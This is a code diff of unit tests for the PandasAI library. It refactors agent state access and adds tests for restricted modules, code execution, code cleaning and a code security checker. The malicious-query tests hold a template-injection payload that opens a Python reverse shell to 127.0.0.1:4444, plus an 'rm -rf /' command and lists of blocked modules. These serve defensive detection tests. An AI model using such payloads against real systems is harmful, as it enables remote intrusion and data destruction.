+ agent._state.memory.add("Which country has the highest gdp?", True)
+ memory = agent._state.memory.all()
assert len(memory) == 1
agent.start_new_conversation()
- memory = agent.context.memory.all()
+ memory = agent._state.memory.all()
assert len(memory) == 0
def test_call_prompt_success(self, agent: Agent):
- agent.context.config.llm.call = Mock()
+ agent._state.config.llm.call = Mock()
clarification_response = """
What is expected Salary Increase?
"""
- agent.context.config.llm.call.return_value = clarification_response
+ agent._state.config.llm.call.return_value = clarification_response
prompt = BasePrompt(
- context=agent.context,
+ context=agent._state,
code="test code",
)
agent.call_llm_with_prompt(prompt)
- assert agent.context.config.llm.call.call_count == 1
+ assert agent._state.config.llm.call.call_count == 1
def test_call_prompt_max_retries_exceeds(self, agent: Agent):
# raises exception every time
- agent.context.config.llm.call = Mock()
- agent.context.config.llm.call.side_effect = Exception("Raise an exception")
+ agent._state.config.llm.call = Mock()
+ agent._state.config.llm.call.side_effect = Exception("Raise an exception")
with pytest.raises(Exception):
agent.call_llm_with_prompt("Test Prompt")
- assert agent.context.config.llm.call.call_count == 3
+ assert agent._state.config.llm.call.call_count == 3
def test_call_prompt_max_retry_on_error(self, agent: Agent):
# test the LLM call failed twice but succeed third time
- agent.context.config.llm.call = Mock()
- agent.context.config.llm.call.side_effect = [
+ agent._state.config.llm.call = Mock()
+ agent._state.config.llm.call.side_effect = [
Exception(),
Exception(),
"LLM Result",
]
prompt = BasePrompt(
- context=agent.context,
+ context=agent._state,
code="test code",
)
result = agent.call_llm_with_prompt(prompt)
assert result == "LLM Result"
- assert agent.context.config.llm.call.call_count == 3
+ assert agent._state.config.llm.call.call_count == 3
def test_call_prompt_max_retry_twice(self, agent: Agent):
# test the LLM call failed once but succeed second time
- agent.context.config.llm.call = Mock()
- agent.context.config.llm.call.side_effect = [Exception(), "LLM Result"]
+ agent._state.config.llm.call = Mock()
+ agent._state.config.llm.call.side_effect = [Exception(), "LLM Result"]
prompt = BasePrompt(
- context=agent.context,
+ context=agent._state,
code="test code",
)
result = agent.call_llm_with_prompt(prompt)
assert result == "LLM Result"
- assert agent.context.config.llm.call.call_count == 2
+ assert agent._state.config.llm.call.call_count == 2
def test_call_llm_with_prompt_no_retry_on_error(self, agent: Agent):
# Test when LLM call raises an exception but retries are disabled
- agent.context.config.use_error_correction_framework = False
- agent.context.config.llm.call = Mock()
- agent.context.config.llm.call.side_effect = Exception()
+ agent._state.config.use_error_correction_framework = False
+ agent._state.config.llm.call = Mock()
+ agent._state.config.llm.call.side_effect = Exception()
with pytest.raises(Exception):
agent.call_llm_with_prompt("Test Prompt")
- assert agent.context.config.llm.call.call_count == 1
+ assert agent._state.config.llm.call.call_count == 1
def test_call_llm_with_prompt_max_retries_check(self, agent: Agent):
# Test when LLM call raises an exception, but called call function
# 'max_retries' time
- agent.context.config.max_retries = 5
- agent.context.config.llm.call = Mock()
- agent.context.config.llm.call.side_effect = Exception()
+ agent._state.config.max_retries = 5
+ agent._state.config.llm.call = Mock()
+ agent._state.config.llm.call.side_effect = Exception()
with pytest.raises(Exception):
agent.call_llm_with_prompt("Test Prompt")
- assert agent.context.config.llm.call.call_count == 5
+ assert agent._state.config.llm.call.call_count == 5
def test_load_llm_with_pandasai_llm(self, agent: Agent, llm):
- assert agent.get_llm(llm) == llm
+ assert agent._get_llm(llm) == llm
def test_load_llm_none(self, agent: Agent, llm):
with patch("pandasai.llm.bamboo_llm.BambooLLM") as mock, patch.dict(
@@ -217,7 +401,8 @@ def test_load_llm_none(self, agent: Agent, llm):
):
bamboo_llm = Mock(type="bamboo")
mock.return_value = bamboo_llm
- config = agent.get_config({"llm": None})
+ config = agent._get_config({})
assert config.llm.__class__.__name__ == "BambooLLM"
def test_train_method_with_qa(self, agent):
@@ -225,16 +410,18 @@ def test_train_method_with_qa(self, agent):
codes = ["code1", "code2"]
agent.train(queries, codes)
- agent._vectorstore.add_docs.assert_not_called()
- agent._vectorstore.add_question_answer.assert_called_once_with(queries, codes)
+ agent._state.vectorstore.add_docs.assert_not_called()
+ agent._state.vectorstore.add_question_answer.assert_called_once_with(
+ queries, codes
+ )
def test_train_method_with_docs(self, agent):
docs = ["doc1"]
agent.train(docs=docs)
- agent._vectorstore.add_question_answer.assert_not_called()
- agent._vectorstore.add_docs.assert_called_once()
- agent._vectorstore.add_docs.assert_called_once_with(docs)
+ agent._state.vectorstore.add_question_answer.assert_not_called()
+ agent._state.vectorstore.add_docs.assert_called_once()
+ agent._state.vectorstore.add_docs.assert_called_once_with(docs)
def test_train_method_with_docs_and_qa(self, agent):
docs = ["doc1"]
@@ -242,10 +429,12 @@ def test_train_method_with_docs_and_qa(self, agent):
codes = ["code1", "code2"]
agent.train(queries, codes, docs=docs)
- agent._vectorstore.add_question_answer.assert_called_once()
- agent._vectorstore.add_question_answer.assert_called_once_with(queries, codes)
- agent._vectorstore.add_docs.assert_called_once()
- agent._vectorstore.add_docs.assert_called_once_with(docs)
+ agent._state.vectorstore.add_question_answer.assert_called_once()
+ agent._state.vectorstore.add_question_answer.assert_called_once_with(
+ queries, codes
+ )
+ agent._state.vectorstore.add_docs.assert_called_once()
+ agent._state.vectorstore.add_docs.assert_called_once_with(docs)
def test_train_method_with_queries_but_no_code(self, agent):
queries = ["query1", "query2"]
@@ -257,22 +446,15 @@ def test_train_method_with_code_but_no_queries(self, agent):
with pytest.raises(ValueError):
agent.train(codes)
- def test_(self, sample_df, config):
+ def test_malicious_query_detection(self, sample_df, config):
agent = Agent(sample_df, config, memory_size=10)
- response = agent.chat(
- """{% for x in ().__class__.__base__.__subclasses__() %} {% if "warning" in x.__name__ %} {{x()._module.__builtins__['__import__']('os').popen('python3 -c \\'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn("sh")\\'')}} {% endif %} {% endfor %}"""
- )
- assert (
- response
- == """Unfortunately, I was not able to get your answers, because of the following error:
-
-The query contains references to io or os modules or b64decode method which can be used to execute or access system resources in unsafe ways.
-"""
- )
+ with pytest.raises(MaliciousQueryError):
+ agent.chat(
+ """{% for x in ().__class__.__base__.__subclasses__() %} {% if "warning" in x.__name__ %} {{x()._module.__builtins__['__import__']('os').popen('python3 -c \\'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn("sh")\\'')}} {% endif %} {% endfor %}"""
+ )
- def test_query_detection(self, sample_df, config):
- agent = Agent(sample_df, config, memory_size=10)
+ def test_query_detection(self, agent: Agent):
# Positive cases: should detect malicious keywords
malicious_queries = [
@@ -285,26 +467,9 @@ def test_query_detection(self, sample_df, config):
"io.open('file.txt', 'w')",
]
- expected_malicious_response = (
- """Unfortunately, I was not able to get your answers, because of the following error:\n\n"""
- """The query contains references to io or os modules or b64decode method which can be used to execute or access system resources in unsafe ways.\n"""
- )
-
for query in malicious_queries:
- response = agent.chat(query)
- assert response == expected_malicious_response
-
- # Negative cases: should not detect any malicious keywords
- safe_queries = [
- "print('Hello world')",
- "through osmosis",
- "the ionosphere",
- "the capital of Norway is Oslo",
- ]
-
- for query in safe_queries:
- response = agent.chat(query)
- assert "Unfortunately, I was not able to get your answers" not in response
+ with pytest.raises(MaliciousQueryError):
+ agent.chat(query)
def test_query_detection_disable_security(self, sample_df, config):
config["security"] = "none"
@@ -320,22 +485,5 @@ def test_query_detection_disable_security(self, sample_df, config):
"io.open('file.txt', 'w')",
]
- expected_malicious_response = (
- """Unfortunately, I was not able to get your answers, because of the following error:\n\n"""
- """The query contains references to io or os modules or b64decode method which can be used to execute or access system resources in unsafe ways.\n"""
- )
-
for query in malicious_queries:
- response = agent.chat(query)
- assert response != expected_malicious_response
-
- safe_queries = [
- "print('Hello world')",
- "through osmosis",
- "the ionosphere",
- "the capital of Norway is Oslo",
- ]
-
- for query in safe_queries:
- response = agent.chat(query)
- assert "Unfortunately, I was not able to get your answers" not in response
+ agent.chat(query)
diff --git a/tests/unit_tests/agent/test_base_agent.py b/tests/unit_tests/agent/test_base_agent.py
deleted file mode 100644
index 95b0d9c34..000000000
--- a/tests/unit_tests/agent/test_base_agent.py
+++ /dev/null
@@ -1,60 +0,0 @@
-from pandasai.dataframe.base import DataFrame
-from pandasai.llm.fake import FakeLLM
-import pytest
-from unittest.mock import Mock, patch, MagicMock
-from pandasai.agent.base import BaseAgent
-from pandasai.pipelines.chat.chat_pipeline_input import ChatPipelineInput
-
-
-class TestBaseAgent:
- @pytest.fixture(autouse=True)
- def mock_bamboo_llm(self):
- with patch("pandasai.llm.bamboo_llm.BambooLLM") as mock:
- mock.return_value = Mock(type="bamboo")
- yield mock
-
- @pytest.fixture
- def mock_agent(self):
- # Create a mock DataFrame
- mock_df = DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
- fake_llm = FakeLLM()
- agent = BaseAgent([mock_df], config={"llm": fake_llm})
- agent.pipeline = MagicMock()
- return agent
-
- def test_chat_starts_new_conversation(self, mock_agent):
- with patch.object(mock_agent, "start_new_conversation") as mock_start_new:
- mock_agent.chat("Test query")
- mock_start_new.assert_called_once()
-
- def test_follow_up_continues_conversation(self, mock_agent):
- with patch.object(mock_agent, "start_new_conversation") as mock_start_new:
- mock_agent.follow_up("Follow-up query")
- mock_start_new.assert_not_called()
-
- def test_chat_and_follow_up_use_process_query(self, mock_agent):
- with patch.object(mock_agent, "_process_query") as mock_process:
- mock_agent.chat("Test query")
- mock_process.assert_called_once_with("Test query", None)
-
- mock_process.reset_mock()
-
- mock_agent.follow_up("Follow-up query")
- mock_process.assert_called_once_with("Follow-up query", None)
-
- def test_process_query_calls_pipeline(self, mock_agent):
- mock_agent._process_query("Test query")
- mock_agent.pipeline.run.assert_called_once()
- assert isinstance(mock_agent.pipeline.run.call_args[0][0], ChatPipelineInput)
-
- def test_process_query_handles_exceptions(self, mock_agent):
- mock_agent.pipeline.run.side_effect = Exception("Test error")
- result = mock_agent._process_query("Test query")
- assert "Test error" in result
-
- def test_malicious_query_detection(self, mock_agent):
- result = mock_agent._process_query("import os; os.system('rm -rf /')")
- assert (
- "The query contains references to io or os modules or b64decode method which can be used to execute or access system resources in unsafe ways."
- in result
- )
diff --git a/tests/unit_tests/core/code_execution/safe_libs/test_base_restricted_module.py b/tests/unit_tests/core/code_execution/safe_libs/test_base_restricted_module.py
new file mode 100644
index 000000000..9c945b983
--- /dev/null
+++ b/tests/unit_tests/core/code_execution/safe_libs/test_base_restricted_module.py
@@ -0,0 +1,146 @@
+import unittest
+from pandasai.core.code_execution.safe_libs.base_restricted_module import (
+ BaseRestrictedModule,
+ SecurityError,
+)
+
+
+class TestBaseRestrictedModule(unittest.TestCase):
+ def setUp(self):
+ """Set up the test environment for BaseRestrictedModule."""
+ self.module = BaseRestrictedModule()
+
+ def test_wrap_function_allows_safe_arguments(self):
+ """Test that the wrapped function allows safe arguments."""
+
+ @self.module._wrap_function
+ def safe_function(arg1, arg2):
+ return arg1 + arg2
+
+ result = safe_function(1, 2)
+ self.assertEqual(result, 3)
+
+ def test_wrap_function_rejects_restricted_module(self):
+ """Test that the wrapped function rejects a restricted module as an argument."""
+
+ @self.module._wrap_function
+ def function_with_restriction(arg):
+ return arg
+
+ with self.assertRaises(SecurityError) as context:
+ function_with_restriction("os")
+
+ self.assertEqual(
+ str(context.exception), "Potential security risk: 'os' is not allowed"
+ )
+
+ def test_wrap_function_rejects_restricted_module_in_kwargs(self):
+ """Test that the wrapped function rejects a restricted module in keyword arguments."""
+
+ @self.module._wrap_function
+ def function_with_restriction(arg):
+ return arg
+
+ with self.assertRaises(SecurityError) as context:
+ function_with_restriction(arg="sys")
+
+ self.assertEqual(
+ str(context.exception), "Potential security risk: 'sys' is not allowed"
+ )
+
+ def test_wrap_class_allows_safe_method(self):
+ """Test that the wrapped class allows safe method calls."""
+
+ class SafeClass:
+ def safe_method(self, arg1, arg2):
+ return arg1 + arg2
+
+ WrappedSafeClass = self.module._wrap_class(SafeClass)
+ instance = WrappedSafeClass()
+
+ # Access the method through the wrapped instance
+ result = instance.safe_method(1, 2)
+ self.assertEqual(result, 3)
+
+ def test_wrap_class_rejects_restricted_method(self):
+ """Test that the wrapped class rejects a restricted method call."""
+
+ class RestrictedClass:
+ def restricted_method(self, arg):
+ return arg
+
+ WrappedRestrictedClass = self.module._wrap_class(RestrictedClass)
+ instance = WrappedRestrictedClass()
+
+ with self.assertRaises(SecurityError) as context:
+ instance.restricted_method("importlib")
+
+ self.assertEqual(
+ str(context.exception),
+ "Potential security risk: 'importlib' is not allowed",
+ )
+
+ def test_wrap_function_with_multiple_arguments(self):
+ """Test that the wrapped function allows multiple safe arguments."""
+
+ @self.module._wrap_function
+ def multi_arg_function(arg1, arg2, arg3):
+ return arg1 * arg2 + arg3
+
+ result = multi_arg_function(2, 3, 4)
+ self.assertEqual(result, 10)
+
+ def test_wrap_function_with_list_argument(self):
+ """Test that the wrapped function allows a list as an argument."""
+
+ @self.module._wrap_function
+ def list_function(my_list):
+ return sum(my_list)
+
+ result = list_function([1, 2, 3])
+ self.assertEqual(result, 6)
+
+ def test_wrap_function_with_dict_argument(self):
+ """Test that the wrapped function allows a dictionary as an argument."""
+
+ @self.module._wrap_function
+ def dict_function(my_dict):
+ return my_dict.get("key", 0)
+
+ result = dict_function({"key": 10})
+ self.assertEqual(result, 10)
+
+ def test_wrap_class_with_inherited_methods(self):
+ """Test that the wrapped class allows inherited method calls."""
+
+ class BaseClass:
+ def base_method(self):
+ return "Base method called"
+
+ class DerivedClass(BaseClass):
+ def derived_method(self):
+ return "Derived method called"
+
+ WrappedDerivedClass = self.module._wrap_class(DerivedClass)
+ instance = WrappedDerivedClass()
+ self.assertEqual(instance.base_method(), "Base method called")
+ self.assertEqual(instance.derived_method(), "Derived method called")
+
+ def test_wrap_function_with_restricted_module_in_args(self):
+ """Test that the wrapped function rejects a restricted module in arguments."""
+
+ @self.module._wrap_function
+ def function_with_restriction(arg):
+ return arg
+
+ with self.assertRaises(SecurityError) as context:
+ function_with_restriction("subprocess")
+
+ self.assertEqual(
+ str(context.exception),
+ "Potential security risk: 'subprocess' is not allowed",
+ )
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/unit_tests/core/code_execution/test_code_execution.py b/tests/unit_tests/core/code_execution/test_code_execution.py
new file mode 100644
index 000000000..2981795df
--- /dev/null
+++ b/tests/unit_tests/core/code_execution/test_code_execution.py
@@ -0,0 +1,129 @@
+import unittest
+from unittest.mock import MagicMock
+import ast
+from pandasai.core.code_execution.code_executor import CodeExecutor
+from pandasai.config import Config
+from pandasai.exceptions import NoResultFoundError
+
+
+class TestCodeExecutor(unittest.TestCase):
+ def setUp(self):
+ self.config = MagicMock(spec=Config)
+ self.executor = CodeExecutor(self.config)
+
+ def test_initialization(self):
+ """Test initialization of CodeExecutor."""
+ self.assertIsInstance(self.executor._environment, dict)
+ self.assertEqual(self.executor._plots, [])
+
+ def test_add_to_env(self):
+ """Test adding a variable to the environment."""
+ self.executor.add_to_env("test_var", 42)
+ self.assertEqual(self.executor._environment["test_var"], 42)
+
+ def test_execute_valid_code(self):
+ """Test executing valid code."""
+ code = "result = 5 + 5"
+ self.executor.execute(code)
+ self.assertEqual(self.executor._environment["result"], 10)
+
+ def test_execute_code_with_variable(self):
+ """Test executing code that defines a variable."""
+ code = "my_list = [1, 2, 3]"
+ self.executor.execute(code)
+ self.assertEqual(self.executor._environment["my_list"], [1, 2, 3])
+
+ def test_execute_and_return_result(self):
+ """Test executing code and returning the result."""
+ code = "result = 3 * 3"
+ result = self.executor.execute_and_return_result(code)
+ self.assertEqual(result, 9)
+
+ def test_execute_and_return_result_no_result(self):
+ """Test execution when no result is returned."""
+ code = "x = 10"
+ with self.assertRaises(NoResultFoundError):
+ self.executor.execute_and_return_result(code)
+
+ def test_execute_and_return_result_with_plot(self):
+ """Test execution with a plot result."""
+ code = "result = {'type': 'plot', 'value': 'my_plot'}"
+ self.executor.execute(code)
+ result = self.executor.execute_and_return_result(code)
+ self.assertEqual(result, {"type": "plot", "value": "my_plot"})
+
+ def test_get_variable_last_line_of_code_assignment(self):
+ """Test extracting variable name from an assignment."""
+ code = "a = 5\nb = 10\nresult = a + b"
+ var_name, subscript = self.executor._get_variable_last_line_of_code(code)
+ self.assertEqual(var_name, "result")
+ self.assertEqual(subscript, None)
+
+ def test_get_variable_last_line_of_code_expression(self):
+ """Test extracting variable name from an expression."""
+ code = "print(5)\nresult = 5 + 5"
+ var_name, _ = self.executor._get_variable_last_line_of_code(code)
+ self.assertEqual(var_name, "result")
+
+ def test_get_variable_last_line_of_code_invalid(self):
+ """Test handling of invalid code syntax."""
+ code = "invalid syntax"
+ var_name = self.executor._get_variable_last_line_of_code(code)
+ self.assertIsNone(var_name)
+
+ def test_get_assign_variable_with_name(self):
+ """Test extracting variable name from an assignment node with a Name target."""
+ assign_node = MagicMock()
+ assign_node.targets = [MagicMock(spec=ast.Name)]
+ assign_node.targets[0].id = "my_var"
+
+ var_name, _ = self.executor._get_assign_variable(assign_node)
+ self.assertEqual(var_name, "my_var")
+
+ def test_get_assign_variable_with_subscript(self):
+ """Test extracting variable name from an assignment node with a Subscript target."""
+ assign_node = MagicMock()
+ subscript_mock = MagicMock(spec=ast.Subscript)
+ subscript_mock.value = MagicMock(spec=ast.Name)
+ subscript_mock.value.id = "subscript_var"
+ subscript_mock.slice = MagicMock(return_value=5)
+ assign_node.targets = [subscript_mock]
+
+ var_name, _ = self.executor._get_assign_variable(assign_node)
+ self.assertEqual(var_name, "subscript_var")
+
+ def test_get_expr_variable_with_name(self):
+ """Test extracting variable name from an expression node with a Name value."""
+ expr_node = MagicMock()
+ expr_node.value = MagicMock(spec=ast.Name)
+ expr_node.value.id = "my_expr"
+
+ var_name, _ = self.executor._get_expr_variable(expr_node)
+ self.assertEqual(var_name, "my_expr")
+
+ def test_get_subscript_variable_with_name_and_slice(self):
+ """Test extracting variable name from a subscript node with a Name value."""
+ subscript_node = MagicMock(spec=ast.Subscript)
+
+ subscript_node.value = MagicMock(spec=ast.Name)
+ subscript_node.value.id = "my_var"
+
+ subscript_node.slice = MagicMock()
+ subscript_node.slice.value = 0
+
+ variable_name, slice_value = self.executor._get_subscript_variable(
+ subscript_node
+ )
+
+ self.assertEqual(variable_name, "my_var")
+ self.assertEqual(slice_value, 0)
+
+ def test_execute_with_syntax_error(self):
+ """Test executing code that raises a syntax error."""
+ code = "result = 5 +"
+ with self.assertRaises(SyntaxError):
+ self.executor.execute(code)
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/unit_tests/core/code_execution/test_environment.py b/tests/unit_tests/core/code_execution/test_environment.py
new file mode 100644
index 000000000..6d4624f90
--- /dev/null
+++ b/tests/unit_tests/core/code_execution/test_environment.py
@@ -0,0 +1,87 @@
+import unittest
+from unittest.mock import patch, MagicMock
+from pandasai.core.code_execution.environment import (
+ get_environment,
+ import_dependency,
+ get_version,
+)
+from pandasai.core.code_execution.safe_libs.restricted_pandas import RestrictedPandas
+
+
+class TestEnvironmentFunctions(unittest.TestCase):
+ @patch("pandasai.core.code_execution.environment.import_dependency")
+ def test_get_environment_with_secure_mode(self, mock_import_dependency):
+ """Test get_environment function in secure mode."""
+ mock_import_dependency.side_effect = lambda name: MagicMock(name=name)
+ additional_deps = [{"alias": "pd", "module": "pandas", "name": "DataFrame"}]
+ env = get_environment(additional_deps, secure=True)
+
+ self.assertIn("pd", env)
+ self.assertIn("__builtins__", env)
+ self.assertIn("plt", env)
+ self.assertIn("np", env)
+ self.assertIsInstance(env["pd"], RestrictedPandas)
+
+ @patch("pandasai.core.code_execution.environment.import_dependency")
+ def test_get_environment_without_secure_mode(self, mock_import_dependency):
+ """Test get_environment function in non-secure mode."""
+ mock_import_dependency.side_effect = lambda name: MagicMock(name=name)
+ additional_deps = [{"alias": "pd", "module": "pandas", "name": "DataFrame"}]
+ env = get_environment(additional_deps, secure=False)
+
+ self.assertIn("pd", env)
+ self.assertIn("__builtins__", env)
+ self.assertIn("plt", env)
+ self.assertIn("np", env)
+ self.assertIsInstance(env["pd"], MagicMock)
+
+ @patch("pandasai.core.code_execution.environment.importlib.import_module")
+ def test_import_dependency_success(self, mock_import_module):
+ """Test successful import of a dependency."""
+ mock_import_module.return_value = MagicMock(__version__="1.0.0")
+ module = import_dependency("numpy")
+
+ self.assertIsNotNone(module)
+
+ @patch("pandasai.core.code_execution.environment.importlib.import_module")
+ def test_import_dependency_missing(self, mock_import_module):
+ """Test handling of a missing dependency."""
+ mock_import_module.side_effect = ImportError("Module not found")
+ with self.assertRaises(ImportError):
+ import_dependency("non_existent_module")
+
+ @patch("pandasai.core.code_execution.environment.importlib.import_module")
+ def test_import_dependency_version_too_old(self, mock_import_module):
+ """Test handling of a dependency with an old version."""
+ mock_import_module.return_value = MagicMock(__version__="0.9.0")
+ with self.assertRaises(ImportError):
+ import_dependency("numpy", min_version="1.0.0")
+
+ @patch("pandasai.core.code_execution.environment.importlib.import_module")
+ def test_import_dependency_with_extra_message(self, mock_import_module):
+ """Test import dependency with additional error message."""
+ mock_import_module.side_effect = ImportError("Module not found")
+ with self.assertRaises(ImportError) as context:
+ import_dependency("non_existent_module", extra="Please install it.")
+
+ self.assertIn("Please install it.", str(context.exception))
+
+ @patch("pandasai.core.code_execution.environment.importlib.import_module")
+ def test_get_version_success(self, mock_import_module):
+ """Test getting the version of a module successfully."""
+ mock_import_module.return_value = MagicMock(__version__="1.0.0")
+ version = get_version(mock_import_module("numpy"))
+ self.assertEqual(version, "1.0.0")
+
+ @patch("pandasai.core.code_execution.environment.importlib.import_module")
+ def test_get_version_failure(self, mock_import_module):
+ """Test getting version fails when __version__ is not present."""
+ module_mock = MagicMock()
+ module_mock.__name__ = "numpy"
+ mock_import_module.return_value = module_mock
+ with self.assertRaises(ImportError):
+ get_version(mock_import_module("numpy"))
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/unit_tests/core/code_generation/test_code_cleaning.py b/tests/unit_tests/core/code_generation/test_code_cleaning.py
new file mode 100644
index 000000000..39c077d39
--- /dev/null
+++ b/tests/unit_tests/core/code_generation/test_code_cleaning.py
@@ -0,0 +1,179 @@
+import unittest
+from unittest.mock import MagicMock
+import ast
+from pandasai.core.code_generation.code_cleaning import CodeCleaner
+from pandasai.agent.state import AgentState
+from pandasai.exceptions import BadImportError, MaliciousQueryError
+from pandasai.dataframe.base import DataFrame
+
+
+class TestCodeCleaner(unittest.TestCase):
+
+ def setUp(self):
+ """Set up a mock context and a sample DataFrame for CodeCleaner."""
+ self.context = MagicMock(spec=AgentState)
+ self.cleaner = CodeCleaner(self.context)
+ self.sample_df = DataFrame(
+ {
+ "country": ["United States", "United Kingdom", "Japan", "China"],
+ "gdp": [
+ 19294482071552,
+ 2891615567872,
+ 4380756541440,
+ 14631844184064,
+ ],
+ "happiness_index": [6.94, 7.22, 5.87, 5.12],
+ }
+ )
+
+ def test_check_imports_valid(self):
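+ """An allowed import (pandas) passes _check_imports without error."""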
+ node = ast.Import(names=[ast.alias(name="pandas", asname=None)])
+ result = self.cleaner._check_imports(node)
+ self.assertIsNone(result)
+
+ def test_check_imports_invalid(self):
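+ """A non-whitelisted import (here numpy) raises BadImportError."""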
+ node = ast.Import(names=[ast.alias(name="numpy", asname=None)])
+ with self.assertRaises(BadImportError):
+ self.cleaner._check_imports(node)
+
+ def test_check_is_df_declaration_true(self):
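+ """A pd.DataFrame(...) call is detected as a DataFrame declaration."""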
+ node = ast.Call(
+ func=ast.Attribute(
+ value=ast.Name(id="pd", ctx=ast.Load()),
+ attr="DataFrame",
+ ctx=ast.Load(),
+ ),
+ args=[],
+ keywords=[],
+ )
+ node_ast = MagicMock()
+ node_ast.value = node
+ result = self.cleaner._check_is_df_declaration(node_ast)
+ self.assertTrue(result)
+
+ def test_check_is_df_declaration_false(self):
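+ """A plain list(...) call is not treated as a DataFrame declaration."""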
+ node = ast.Call(func=ast.Name(id="list", ctx=ast.Load()), args=[], keywords=[])
+ node_ast = MagicMock()
+ node_ast.value = node
+ result = self.cleaner._check_is_df_declaration(node_ast)
+ self.assertFalse(result)
+
+ def test_get_target_names_single(self):
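+ """A single Name target yields one target name and no slice."""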
+ node = ast.Assign(
+ targets=[ast.Name(id="df", ctx=ast.Store())],
+ value=ast.Name(id="pd", ctx=ast.Load()),
+ )
+ target_names, is_slice, target = self.cleaner._get_target_names(node.targets)
+ self.assertEqual(target_names, ["df"])
+ self.assertFalse(is_slice)
+
+ def test_check_direct_sql_func_def_exists_true(self):
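+ """With direct_sql enabled, an execute_sql_query definition is detected."""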
+ self.context.config.direct_sql = True
+ node = ast.FunctionDef(
+ name="execute_sql_query",
+ args=ast.arguments(
+ args=[],
+ vararg=None,
+ kwonlyargs=[],
+ kw_defaults=[],
+ kwarg=None,
+ defaults=[],
+ ),
+ body=[],
+ decorator_list=[],
+ returns=None,
+ )
+ result = self.cleaner._check_direct_sql_func_def_exists(node)
+ self.assertTrue(result)
+
+ def test_check_direct_sql_func_def_exists_false(self):
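+ """With direct_sql disabled, the execute_sql_query check returns False."""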
+ self.context.config.direct_sql = False
+ node = ast.FunctionDef(
+ name="execute_sql_query",
+ args=ast.arguments(
+ args=[],
+ vararg=None,
+ kwonlyargs=[],
+ kw_defaults=[],
+ kwarg=None,
+ defaults=[],
+ ),
+ body=[],
+ decorator_list=[],
+ returns=None,
+ )
+ result = self.cleaner._check_direct_sql_func_def_exists(node)
+ self.assertFalse(result)
+
+ def test_replace_table_names_valid(self):
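+ """Table names present in the allowed mapping are preserved in the query."""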
+ sql_query = "SELECT * FROM my_table;"
+ table_names = ["my_table"]
+ allowed_table_names = {"my_table": "my_table"}
+ result = self.cleaner._replace_table_names(
+ sql_query, table_names, allowed_table_names
+ )
+ self.assertEqual(result, "SELECT * FROM my_table;")
+
+ def test_replace_table_names_invalid(self):
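+ """A table name absent from the allowed mapping raises MaliciousQueryError."""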
+ sql_query = "SELECT * FROM my_table;"
+ table_names = ["my_table"]
+ allowed_table_names = {}
+ with self.assertRaises(MaliciousQueryError):
+ self.cleaner._replace_table_names(
+ sql_query, table_names, allowed_table_names
+ )
+
+ def test_clean_sql_query(self):
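+ """Cleaning strips the trailing semicolon and validates table names against dfs."""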
+ sql_query = "SELECT * FROM my_table;"
+ mock_dataframe = MagicMock(spec=object)
+ mock_dataframe.name = "my_table"
+ self.cleaner.context.dfs = [mock_dataframe]
+ result = self.cleaner._clean_sql_query(sql_query)
+ self.assertEqual(result, "SELECT * FROM my_table")
+
+ def test_validate_and_make_table_name_case_sensitive(self):
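+ """SQL string assignments are validated with case-sensitive table names."""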
+ node = ast.Assign(
+ targets=[ast.Name(id="query", ctx=ast.Store())],
+ value=ast.Constant(value="SELECT * FROM my_table"),
+ )
+ mock_dataframe = MagicMock(spec=object)
+ mock_dataframe.name = "my_table"
+ self.cleaner.context.dfs = [mock_dataframe]
+ updated_node = self.cleaner._validate_and_make_table_name_case_sensitive(node)
+ self.assertEqual(updated_node.value.value, "SELECT * FROM my_table")
+
+ def test_extract_fix_dataframe_redeclarations(self):
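+ """Redeclaration of an existing dataframe is rewritten to a valid AST node."""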
+ node = ast.Assign(
+ targets=[ast.Name(id="df", ctx=ast.Store())],
+ value=ast.Call(
+ func=ast.Attribute(
+ value=ast.Name(id="pd", ctx=ast.Load()),
+ attr="DataFrame",
+ ctx=ast.Load(),
+ ),
+ args=[],
+ keywords=[],
+ ),
+ )
+ self.cleaner.context.dfs = [self.sample_df]
+ code_lines = [
+ """df = pd.DataFrame({
+ "country": ["United States", "United Kingdom", "Japan", "China"],
+ "gdp": [
+ 19294482071552,
+ 2891615567872,
+ 4380756541440,
+ 14631844184064,
+ ],
+ "happiness_index": [6.94, 7.22, 5.87, 5.12],
+ })"""
+ ]
+ additional_deps = []
+ updated_node = self.cleaner.extract_fix_dataframe_redeclarations(
+ node, code_lines, additional_deps
+ )
+ self.assertIsInstance(updated_node, ast.AST)
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/unit_tests/core/code_generation/test_code_security.py b/tests/unit_tests/core/code_generation/test_code_security.py
new file mode 100644
index 000000000..a34c56477
--- /dev/null
+++ b/tests/unit_tests/core/code_generation/test_code_security.py
@@ -0,0 +1,94 @@
+import unittest
+from unittest.mock import MagicMock
+from pandasai.core.code_generation.code_security import CodeSecurityChecker
+from pandasai.agent.state import AgentState
+from pandasai.exceptions import MaliciousCodeGenerated
+
+
+class TestCodeSecurityChecker(unittest.TestCase):
+ def setUp(self):
+ """Set up the test environment for CodeSecurityChecker."""
+ self.context = MagicMock(spec=AgentState)
+ self.security_checker = CodeSecurityChecker(self.context)
+
+ def test_is_malicious_code_with_dangerous_module(self):
+ """Test detection of malicious code with a dangerous module."""
+ code = "import os"
+ with self.assertRaises(MaliciousCodeGenerated) as context:
+ self.security_checker.check(code)
+ self.assertEqual(
+ str(context.exception), "Restricted library import detected: os"
+ )
+
+ def test_is_malicious_code_with_restricted_import(self):
+ """Test detection of malicious code with a restricted import."""
+ code = "from os import mkdir"
+ with self.assertRaises(MaliciousCodeGenerated) as context:
+ self.security_checker.check(code)
+ self.assertEqual(
+ str(context.exception), "Restricted library import detected: os"
+ )
+
+ def test_is_malicious_code_with_private_attribute_access(self):
+ """Test detection of malicious code with private attribute access."""
+ code = "obj._private_method()"
+ with self.assertRaises(MaliciousCodeGenerated) as context:
+ self.security_checker.check(code)
+ self.assertEqual(
+ str(context.exception),
+ "Access to private attribute '_private_method' is not allowed.",
+ )
+
+ def test_is_jailbreak_with_dangerous_builtin(self):
+ """Test detection of jailbreak methods."""
